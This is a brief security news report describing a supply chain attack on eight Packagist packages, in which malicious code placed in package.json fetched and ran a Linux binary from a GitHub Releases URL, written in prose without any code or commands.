A coordinated supply chain attack has infected eight packages on Packagist by injecting malicious code sourced from a GitHub Releases URL, targeting projects that ship JavaScript dependencies.
A new supply chain attack campaign has impacted eight packages listed on Packagist. The malicious code was designed to execute a Linux binary retrieved from a GitHub Releases URL. Although the affected packages were Composer packages, the malicious code was inserted into the package.json file rather than composer.json, specifically targeting projects that ship JavaScript.